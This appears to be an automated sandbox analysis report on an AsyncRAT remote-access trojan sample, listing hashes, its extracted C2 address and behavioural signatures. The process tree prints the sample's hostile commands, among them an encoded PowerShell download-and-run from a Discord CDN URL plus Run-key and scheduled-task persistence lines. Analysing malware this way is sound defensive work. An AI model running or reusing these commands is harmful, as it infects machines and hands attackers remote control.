Analysis
-
max time kernel
135s -
max time network
146s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system -
submitted
25/12/2022, 07:27
Static task
static1
Behavioral task
behavioral1
Sample
65dd5fbc588a39cc22d91923a4fbe3f3fca6fc964506470c6551f16ed89e3df2.exe
Resource
win10-20220812-en
General
-
Target
65dd5fbc588a39cc22d91923a4fbe3f3fca6fc964506470c6551f16ed89e3df2.exe
-
Size
5KB
-
MD5
8615a8a7fa0a063cd143c3d4f1252666
-
SHA1
f664d4e086ccb6703e2aba9c3361373fe990b84c
-
SHA256
65dd5fbc588a39cc22d91923a4fbe3f3fca6fc964506470c6551f16ed89e3df2
-
SHA512
3a60a30bcc5b3de4d5342854ebed586e572b309185125efefba684c5451b482a822ca7e01d9640b7665b8ff2fb0ce7eb84f86b02b62833b01bdbd59fa875d5b2
-
SSDEEP
96:2OZZ79nSCFmOO0TUq8oftOENtUqXo8zntvngd3oj/rl:2Mp9nZFZnUq8okENtUqXLhgdE
Malware Config
Extracted
asyncrat
0.5.7B
System Guard Runtime
85.105.88.221:2531
System Guard Runtime
-
delay
3
-
install
false
-
install_file
System Guard Runtime
-
install_folder
%AppData%
Signatures
-
Async RAT payload 2 IoCs
resource yara_rule behavioral1/memory/3492-207-0x000000000040D0EE-mapping.dmp asyncrat behavioral1/memory/3492-203-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1112 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 3900 2.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\SystemGuardRuntime = "C:\\Users\\Admin\\AppData\\Roaming\\SystemGuardRuntime\\SystemGuardRuntime.exe" powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3900 set thread context of 3492 3900 2.exe 73 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4840 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1112 powershell.exe 1112 powershell.exe 1112 powershell.exe 1524 powershell.exe 1524 powershell.exe 1524 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1112 powershell.exe Token: SeDebugPrivilege 1524 powershell.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 2780 wrote to memory of 1112 2780 65dd5fbc588a39cc22d91923a4fbe3f3fca6fc964506470c6551f16ed89e3df2.exe 66 PID 2780 wrote to memory of 1112 2780 65dd5fbc588a39cc22d91923a4fbe3f3fca6fc964506470c6551f16ed89e3df2.exe 66 PID 1112 wrote to memory of 3900 1112 powershell.exe 68 PID 1112 wrote to memory of 3900 1112 powershell.exe 68 PID 1112 wrote to memory of 3900 1112 powershell.exe 68 PID 3900 wrote to memory of 1524 3900 2.exe 69 PID 3900 wrote to memory of 1524 3900 2.exe 69 PID 3900 wrote to memory of 1524 3900 2.exe 69 PID 3900 wrote to memory of 4940 3900 2.exe 70 PID 3900 wrote to memory of 4940 3900 2.exe 70 PID 3900 wrote to memory of 4940 3900 2.exe 70 PID 3900 wrote to memory of 3492 3900 2.exe 73 PID 3900 wrote to memory of 3492 3900 2.exe 73 PID 3900 wrote to memory of 3492 3900 2.exe 73 PID 3900 wrote to memory of 3492 3900 2.exe 73 PID 3900 wrote to memory of 3492 3900 2.exe 73 PID 3900 wrote to memory of 3492 3900 2.exe 73 PID 3900 wrote to memory of 3492 3900 2.exe 73 PID 3900 wrote to memory of 3492 3900 2.exe 73 PID 4940 wrote to memory of 4840 4940 cmd.exe 74 PID 4940 wrote to memory of 4840 4940 cmd.exe 74 PID 4940 wrote to memory of 4840 4940 cmd.exe 74
Processes
-
C:\Users\Admin\AppData\Local\Temp\65dd5fbc588a39cc22d91923a4fbe3f3fca6fc964506470c6551f16ed89e3df2.exe"C:\Users\Admin\AppData\Local\Temp\65dd5fbc588a39cc22d91923a4fbe3f3fca6fc964506470c6551f16ed89e3df2.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZwBnACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA1ADYAMAA0ADYANQA0ADQANAA2ADIAMgAzADMANwAwAC8AMQAwADUANQA2ADAANAA3ADkAMgAzADMAOAAxADYANQA4ADEAMAAvAEMAUgAuAGUAeABlACcALAAgADwAIwBnAHgAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAeQBwACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHYAbQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAKQA8ACMAZAB4AHMAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABkAHMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAcAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAPAAjAGMAaQBnACMAPgA="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Users\Admin\AppData\Roaming\2.exe"C:\Users\Admin\AppData\Roaming\2.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3900 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime' -Value '"C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe"' -PropertyType 'String'4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f4⤵
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f5⤵
- Creates scheduled task(s)
PID:4840
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd4⤵PID:3492
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD511e537ee288bbd2405108159acc4266d
SHA1341d4adb4316159bab7e0df160d679c4c0b96c5c
SHA2567731c89a5b955c1b28cf3b830083446901ebdebd394b7dd5697a3979e1771d05
SHA512cbc77113e4a320734be7131bbbe12dc9efbfc912af439cc1ec9a7346f67698a3352461393a3ccbf202eab40419b939df874ccfe17d035da20239cf949c5b9c78
-
Filesize
87KB
MD53c6ccbfe897915f0fe6bc34d193bf4a0
SHA16fe3161ee66e317889066a302474e511220939e7
SHA25652bf11364e8430f4b271ebb29e2a55451543338be5b2a34e731ede58eef04241
SHA512e0bf1fc11deacb24b5d5de4bcfc522057d1ca1b4866325356b2c9a1f009c6562eee0c0e602478b3639de4beff14997d59a3b428281d9111278544fc5e3199536
-
Filesize
87KB
MD53c6ccbfe897915f0fe6bc34d193bf4a0
SHA16fe3161ee66e317889066a302474e511220939e7
SHA25652bf11364e8430f4b271ebb29e2a55451543338be5b2a34e731ede58eef04241
SHA512e0bf1fc11deacb24b5d5de4bcfc522057d1ca1b4866325356b2c9a1f009c6562eee0c0e602478b3639de4beff14997d59a3b428281d9111278544fc5e3199536